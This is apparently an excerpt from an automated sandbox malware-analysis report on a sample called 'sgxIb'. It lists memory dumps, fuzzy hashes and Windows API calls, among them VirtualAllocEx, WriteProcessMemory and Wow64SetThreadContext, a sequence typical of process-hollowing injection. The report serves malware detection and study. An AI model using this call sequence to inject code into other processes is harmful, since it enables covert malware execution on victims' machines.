                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a319e0621bb32016ea53408298195abee56777cd44a93e5aa22af5a26c2ef573
                                • Instruction ID: 6a91789dfdeed74932a62e32a09899abbd1b017e11d77d8441562f31e251e8e6
                                • Opcode Fuzzy Hash: a319e0621bb32016ea53408298195abee56777cd44a93e5aa22af5a26c2ef573
                                • Instruction Fuzzy Hash: 73E16E70F103098FDB64EF68D8806AEB7B2EF89304F15852AD416AB350DB75EC46CB91
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 90af5834029d20f278ec890d65c74fcd0b2437ed1694fe5979290a060b924b80
                                • Instruction ID: f62f8c04076afce4ac5e5a549fde869c4b3bcaf545d65cfe35098df26e88475f
                                • Opcode Fuzzy Hash: 90af5834029d20f278ec890d65c74fcd0b2437ed1694fe5979290a060b924b80
                                • Instruction Fuzzy Hash: 2E912D70F106198FDB54DF69D8A07AE7BB2FBC8300F508569D80AAB344EB75EC458B91
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 694b43c1348b86ab9e08acd6774f905a210aecad1238e25d2756d986b14bf418
                                • Instruction ID: 659c591484bbe5b43adfbeddefc4d272310bbc39e602ec6b87e68d7850cfcc3c
                                • Opcode Fuzzy Hash: 694b43c1348b86ab9e08acd6774f905a210aecad1238e25d2756d986b14bf418
                                • Instruction Fuzzy Hash: 9261A571F001114FDB54ABBEC88466EBAE7AFC4620F194479D80ADB364DE76ED0287D1
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd

                                Execution Graph

                                Execution Coverage:10.6%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:141
                                Total number of Limit Nodes:5

                                Control-flow Graph

                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D90ECE
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 64d061d502403f7980b08662d1d4cd945061bb1ae801485e51dc0553e5e7c98c
                                • Instruction ID: 56233ab3044e8a3bdfa0a06948874d1848f74812207657c3f4d0b54048288dd0
                                • Opcode Fuzzy Hash: 64d061d502403f7980b08662d1d4cd945061bb1ae801485e51dc0553e5e7c98c
                                • Instruction Fuzzy Hash: 87A14C71D00719DFEF54CF68D8417DEBBB2AF48314F148569E809A7280DB749A85CFA1

                                Control-flow Graph

                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D90ECE
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 7748942c72557e49003565afa477289a556db410e25a9d461e9f5bfa4cca9a06
                                • Instruction ID: 1d8c00d9f1e3b35b8a78039516b572617084ef76cf9bad682f97f756704d2669
                                • Opcode Fuzzy Hash: 7748942c72557e49003565afa477289a556db410e25a9d461e9f5bfa4cca9a06
                                • Instruction Fuzzy Hash: 60914B71D00719CFEF54CFA8D841BDEBBB2AF48314F148569E809A7280DB749A85CFA1

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000015.00000002.1639206026.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_c30000_sgxIb.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 7fbbd14654d669088b3b3c88ead648b28faeacc2d2ac7df6656dfc15f52e6f61
                                • Instruction ID: c0dbd3b381da2e1309f55940abd415da1962b1faa1688ea14ee521e09169a19e
                                • Opcode Fuzzy Hash: 7fbbd14654d669088b3b3c88ead648b28faeacc2d2ac7df6656dfc15f52e6f61
                                • Instruction Fuzzy Hash: 00715470A10B048FEB24DF2AD45575ABBF1FF88300F008A2EE59AD7A50D775EA45CB91

                                Control-flow Graph

                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 00C359C9
                                Memory Dump Source
                                • Source File: 00000015.00000002.1639206026.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_c30000_sgxIb.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 2b56c9c0a8e11ff0d9e06c0bdd4a1c166f64950efa3266c47acf5126d6bec521
                                • Instruction ID: b48826fac4d7da5f0e41d471541b0ea08c038660b09ab63e876a4c4f1ba3c505
                                • Opcode Fuzzy Hash: 2b56c9c0a8e11ff0d9e06c0bdd4a1c166f64950efa3266c47acf5126d6bec521
                                • Instruction Fuzzy Hash: 0241D3B0C00B1DCBDB24DFA9C84479EFBB5BF44304F2085AAD418AB251DB756946CF90

                                Control-flow Graph

                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 00C359C9
                                Memory Dump Source
                                • Source File: 00000015.00000002.1639206026.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_c30000_sgxIb.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: a0b1f6083cfa4e65842b43da79de099d3e39a38f1ac144b18ab63aeea9eb59ff
                                • Instruction ID: 5c8e53c6424b86c2e6c9309720feeb93da444f19da07e8dd47743cbefc5b55f6
                                • Opcode Fuzzy Hash: a0b1f6083cfa4e65842b43da79de099d3e39a38f1ac144b18ab63aeea9eb59ff
                                • Instruction Fuzzy Hash: 0441D0B0C00B19CBDB24DFAAC88479EFBB1BF48304F20856AD418AB251DB756946CF50

                                Control-flow Graph

                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D906A0
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: fe9e19f483c9401f3894ef1ffbee9065aecdc4b25ebcc5253d3df5541b9e05d3
                                • Instruction ID: 7e9d1fc4809df7923e26ff0f1ecee6cd13f6b77910cd4b9dc60dc478b38416ef
                                • Opcode Fuzzy Hash: fe9e19f483c9401f3894ef1ffbee9065aecdc4b25ebcc5253d3df5541b9e05d3
                                • Instruction Fuzzy Hash: 14213571D003099FDB10DFAAD885BDEBBF5FF88310F10842AE959A7241C7789944CBA1

                                Control-flow Graph

                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D906A0
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: ddffaab3696e75349d4200a0fb309307a46b2aa4017e59da5f711d4b0c750268
                                • Instruction ID: bff8cf1bd53d9783bda30218075088a2e3cfbdcae8ead24d0ee86bd5e7f595e5
                                • Opcode Fuzzy Hash: ddffaab3696e75349d4200a0fb309307a46b2aa4017e59da5f711d4b0c750268
                                • Instruction Fuzzy Hash: C92113B1D003099FDB10DFAAC885BDEBBF5FF88310F10842AE959A7240C7789944CBA0

                                Control-flow Graph

                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D90780
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 4c9cc81dfb312ff97695063ee25848832de69e62373f557fb353e98027c869e3
                                • Instruction ID: 0b7cd73e73fe172c67e24081292e2317ac2d6cc8218158ac211d7c19f3a50a10
                                • Opcode Fuzzy Hash: 4c9cc81dfb312ff97695063ee25848832de69e62373f557fb353e98027c869e3
                                • Instruction Fuzzy Hash: 77212571C003599FDB10CFAAD884BEEBBF1BF48310F10852EE559A7240C7799905CBA0

                                Control-flow Graph

                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D904F6
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: f76ce315975d18a63f6f0c54bb965847722e36ad2d813077edd1293653398d84
                                • Instruction ID: ced5832208775ad6091318adf8b18d4b8777a92ade4a8d8d36f2360282972cba
                                • Opcode Fuzzy Hash: f76ce315975d18a63f6f0c54bb965847722e36ad2d813077edd1293653398d84
                                • Instruction Fuzzy Hash: DD216871D003098FDB50DFAAC484BEEBBF4AF88314F54842ED559A7241C778AA45CFA0

                                Control-flow Graph

                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C3D6C6,?,?,?,?,?), ref: 00C3D787
                                Memory Dump Source
                                • Source File: 00000015.00000002.1639206026.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_c30000_sgxIb.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 304492e27a00116c7529fe17a5d0d0729fc6554d5024ed1834f68c3bec87cce3
                                • Instruction ID: 1a02e8876f4c1cbf9ca50e9c7405acac3fab351dbafaa75f4417c4ba25e712ec
                                • Opcode Fuzzy Hash: 304492e27a00116c7529fe17a5d0d0729fc6554d5024ed1834f68c3bec87cce3
                                • Instruction Fuzzy Hash: 8721E3B5900349EFDB10CF9AD884ADEBBF4EB48310F14846AE919A7350D374A950CFA5

                                Control-flow Graph

                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C3D6C6,?,?,?,?,?), ref: 00C3D787
                                Memory Dump Source
                                • Source File: 00000015.00000002.1639206026.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_c30000_sgxIb.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: afa2bf6a8e79c67e4aefd5dfb53ddad40b26479c88e0edf31a31e628328c20c7
                                • Instruction ID: f2f3804090a46f50cbbfa1d0d278e5c86bbf07be5229f1b6406a1186d0045fac
                                • Opcode Fuzzy Hash: afa2bf6a8e79c67e4aefd5dfb53ddad40b26479c88e0edf31a31e628328c20c7
                                • Instruction Fuzzy Hash: 8F21E4B5D00209EFDB10CF9AD484ADEBBF4EB48310F14845AE919A7350D374A951CFA1

                                Control-flow Graph

                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D90780
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 0fdbb8accc8e2979520ffd1ceffcaaab2daf3236531fe9a25e50bd08fae8e5a2
                                • Instruction ID: 897f68472d46aa95fb97237a44a31e265d2560caf11fce268748b2a379694eed
                                • Opcode Fuzzy Hash: 0fdbb8accc8e2979520ffd1ceffcaaab2daf3236531fe9a25e50bd08fae8e5a2
                                • Instruction Fuzzy Hash: 98212871C003499FDB10DFAAC884BDEBBF5FF48310F50842AE519A7240C7789940CBA1

                                Control-flow Graph

                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D904F6
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 9db944a9bda601fca82f5767f8e24a030c75953a04f3e28b42a313e009189f9b
                                • Instruction ID: 63b064e1230a79a8178bff77baf11bba4fab530211a42100f7b0d36a1eef0bda
                                • Opcode Fuzzy Hash: 9db944a9bda601fca82f5767f8e24a030c75953a04f3e28b42a313e009189f9b
                                • Instruction Fuzzy Hash: 26213471D003098FDB50DFAAC485BEEBBF4AF49210F54842ED519A7240C778AA44CFA1

                                Control-flow Graph

                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D905BE
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 31d14ec126620ee24a0ab904c2fbdcc6ffd7ebf7ce9fef13cec99fd3c370df05
                                • Instruction ID: aff66fd92c5a5b417e12c487338e801a411c39a180e41c2ba3848976d79fd8b4
                                • Opcode Fuzzy Hash: 31d14ec126620ee24a0ab904c2fbdcc6ffd7ebf7ce9fef13cec99fd3c370df05
                                • Instruction Fuzzy Hash: 28115672C002499FDF10DFAAD845BEEBBF5EF48320F14881AE919A7250C7769940CFA1

                                Control-flow Graph

                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D905BE
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 111088b395539625ee3dc848c982e21e0f6e6e60adfe0f97f7d6e2bef275e377
                                • Instruction ID: 601f9ce68252ab043a730736e72fad97e9d63a447aba99aba53f308a0d2edc74
                                • Opcode Fuzzy Hash: 111088b395539625ee3dc848c982e21e0f6e6e60adfe0f97f7d6e2bef275e377
                                • Instruction Fuzzy Hash: 5E1126728003499FDB10DFAAD844BEEBBF5EF48310F14881AE515A7250C7759940CFA1
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D94355
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 35f3c08155291158b075d4d8356508d9f4d22bacf8a2514d5481b6c293de3b0f
                                • Instruction ID: 52fb790ccb56c292e685ffb7d3f3b8f1582741d6c1b67d5c660fc0dcaf1a1f09
                                • Opcode Fuzzy Hash: 35f3c08155291158b075d4d8356508d9f4d22bacf8a2514d5481b6c293de3b0f
                                • Instruction Fuzzy Hash: F611F5B58007499FDB20DF9AC845BDEBBF8EB48310F108819E518A7700C375A544CFA1
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00C3B124), ref: 00C3B35E
                                Memory Dump Source
                                • Source File: 00000015.00000002.1639206026.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_c30000_sgxIb.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: e47212a12be5d932a33a8df19144a61affed3116f1c2dc3f91b15016a559e506
                                • Instruction ID: 780a337d0d1435e2d2b726f21aeacad8f25e72da9bc0eafc3ac20c7ef0f92248
                                • Opcode Fuzzy Hash: e47212a12be5d932a33a8df19144a61affed3116f1c2dc3f91b15016a559e506
                                • Instruction Fuzzy Hash: E51120B5C006098BDB10CF9AC444BDEFBF4EB88320F10846AD929A7210D3B5A905CFA1
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D94355
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: cdb82b843fad3f5e5cd23cfb5770d0221ea590e7bb57331304cf347ddfbbeea1
                                • Instruction ID: 89680799354a471cf33255f92d6ec3ed8daca3821407ae622541be446a95c0d4
                                • Opcode Fuzzy Hash: cdb82b843fad3f5e5cd23cfb5770d0221ea590e7bb57331304cf347ddfbbeea1
                                • Instruction Fuzzy Hash: BF11F2B5800749DFDB10DF9AC889BDEFBF8EB48320F10845AE568A7601D375A944CFA5

                                Execution Graph

                                Execution Coverage:11.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:17
                                Total number of Limit Nodes:4
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 417d6089ffafe5269e2b40492c42596d8964aa2c190cebfd697495188ec658a6
                                • Instruction ID: 13b75517e05ed1fdb6739934b7d742b5c7aa54588375e0feb18bff3b7e045475
                                • Opcode Fuzzy Hash: 417d6089ffafe5269e2b40492c42596d8964aa2c190cebfd697495188ec658a6
                                • Instruction Fuzzy Hash: DE628B34A002049FDB54DB69D694AADB7F2FF88360F24856DD806EB350DB35EE42CB90

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2ba5ad4e5429eb35e0f3dd83b3b7cc63241b18aedef88436eb1c1641afdda95
                                • Instruction ID: 35b6c2b710cef3d2698ae3fd3bab8842ce26e17646b247dabc85c78536e044e1
                                • Opcode Fuzzy Hash: c2ba5ad4e5429eb35e0f3dd83b3b7cc63241b18aedef88436eb1c1641afdda95
                                • Instruction Fuzzy Hash: 25324E31E10759CFDB14EFA9D8906ADB7B1FF89310F50C66AD409AB210EB70AD85CB90

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: aba864a429d638c36de999942ff0c05da58f1387b19f2ef33b1819ca8cd4e586
                                • Instruction ID: 5a173e0001858965d67a31694a03da7b19eaa9a4268ff28318402992c0ac3384
                                • Opcode Fuzzy Hash: aba864a429d638c36de999942ff0c05da58f1387b19f2ef33b1819ca8cd4e586
                                • Instruction Fuzzy Hash: 37C18C35F002188FDB54DBA4C5946AEBBB2FF88320F60816DD402AB354DB35AD52CBA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 642 151ee57-151eecc GlobalMemoryStatusEx 645 151eed5-151eefd 642->645 646 151eece-151eed4 642->646 646->645
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32 ref: 0151EEBF
                                Memory Dump Source
                                • Source File: 00000018.00000002.3858842698.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_1510000_sgxIb.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 532fc9f04f973e5c341f5aeab657ff5788a2c84053e9a6b8f8adda5ddc11975a
                                • Instruction ID: c7cd20dbfd5d1ae8516db7cbd1c53dd9d3f108d812ae24ac61bf60171f7c5775
                                • Opcode Fuzzy Hash: 532fc9f04f973e5c341f5aeab657ff5788a2c84053e9a6b8f8adda5ddc11975a
                                • Instruction Fuzzy Hash: E81100B1C0065A9BDB10CFAAC445BDEFBF4BB48220F14856AD818A7240D378A9448FA1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 649 151ee58-151eecc GlobalMemoryStatusEx 651 151eed5-151eefd 649->651 652 151eece-151eed4 649->652 652->651
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32 ref: 0151EEBF
                                Memory Dump Source
                                • Source File: 00000018.00000002.3858842698.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_1510000_sgxIb.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 5cdd6bff1406e8213c401bfdcdd8c5f6f6bf7fa7d3676469c7a0027d25d5c938
                                • Instruction ID: 1d7bf735f3e97ab9175b4a85c1157e705eceef4ed5be64f7d3363c1cc6d0886a
                                • Opcode Fuzzy Hash: 5cdd6bff1406e8213c401bfdcdd8c5f6f6bf7fa7d3676469c7a0027d25d5c938
                                • Instruction Fuzzy Hash: F711DDB2C0065A9BDB10CFAAC445B9EFBF4BB48220F15856AD818A7640D378A9448FA5

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: eba76f8db1840b72d68288ba682fecf89c29cdd2c117b592639801460cdbba5c
                                • Instruction ID: 71bfb0014024bb1388e3aa7f4148e6fe9eb7c6e617b4189f5a4174e427fc9697
                                • Opcode Fuzzy Hash: eba76f8db1840b72d68288ba682fecf89c29cdd2c117b592639801460cdbba5c
                                • Instruction Fuzzy Hash: 75B18F75E002189FDB60DBA4C5846DEBBB2FF88320F2481ADD4597B344DB31AD56CBA0

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: d5ea3dc0076c165a597a26218c6e07de644354f4132b13111cbb9f213c3b70be
                                • Instruction ID: a1aea953e185a057f8c546e35cdc731e86401951a60eb043338c329ac6bf5e9c
                                • Opcode Fuzzy Hash: d5ea3dc0076c165a597a26218c6e07de644354f4132b13111cbb9f213c3b70be
                                • Instruction Fuzzy Hash: CF812875E012189FDB14DBA4C954ADEBBF2FF88720F248169D401BB354DB71AD46CBA0

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c78efeea143f9f7eede68f484af861dd87cdc8281799f3bb0f4e8202ef2bcc23
                                • Instruction ID: f086cbc08be908d5f806e6ddc0413f0c2d723dac0a357a84585ed6eaa1adac4c
                                • Opcode Fuzzy Hash: c78efeea143f9f7eede68f484af861dd87cdc8281799f3bb0f4e8202ef2bcc23
                                • Instruction Fuzzy Hash: 0E625A74A006098FDB55EF68D590A9EB7B2FF84310B208A78D006AF355DB79FD46CB81

                                Memory Dump Source
                                • Source File: 00000018.00000002.3855162082.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12cd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5a4f2e5852dea9a5baa5a87f46c66f4ae04bb796500337b9cea870592430e87a
                                • Instruction ID: 74b9d025be90fb4091041d509068004a5db4f7443946ad0cd87eb6664926d18c
                                • Opcode Fuzzy Hash: 5a4f2e5852dea9a5baa5a87f46c66f4ae04bb796500337b9cea870592430e87a
                                • Instruction Fuzzy Hash: AD210471514248DFEB11DF94D9C0B2ABB66FB84724F24C67DEA090B247C376D846CAE2
                                Memory Dump Source
                                • Source File: 00000018.00000002.3855162082.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12cd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e9b0eb2e1e132898d69db78c9ba775a87fb1c1be3b5fa23471eb600d9cdcc95
                                • Instruction ID: 42f2b1923de92354168b0a8b4547a5dfd8b1d0cd5e9ef1acabd15a4fdf5bc71f
                                • Opcode Fuzzy Hash: 7e9b0eb2e1e132898d69db78c9ba775a87fb1c1be3b5fa23471eb600d9cdcc95
                                • Instruction Fuzzy Hash: 272133B1510248DFDB10DF94D4C0B26FB65EB84714F20C6BDDB094B282C376E846CAA2
                                Memory Dump Source
                                • Source File: 00000018.00000002.3855162082.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12cd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b31b8bb95ee8c4a88273b83ff775f546e71981db299f0f4cb01ba541fe3c2db
                                • Instruction ID: 99516248e23e45e726b0092455138ece51546ad17656b07cb1adbc595892a6a7
                                • Opcode Fuzzy Hash: 8b31b8bb95ee8c4a88273b83ff775f546e71981db299f0f4cb01ba541fe3c2db
                                • Instruction Fuzzy Hash: E1210371514248DFDB11DF58D9C0B26BB65EB84714F24C67DDA094A282C376D446CAA2
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d3b97f3cd0bca83aade94825479c2f702812b5251ee0e8de56a05c8eae81ddb
                                • Instruction ID: a01aa30395e81765370393cd7dd0d2dfeab62ff76b3c91540d7e3c68e78d5f3f
                                • Opcode Fuzzy Hash: 8d3b97f3cd0bca83aade94825479c2f702812b5251ee0e8de56a05c8eae81ddb
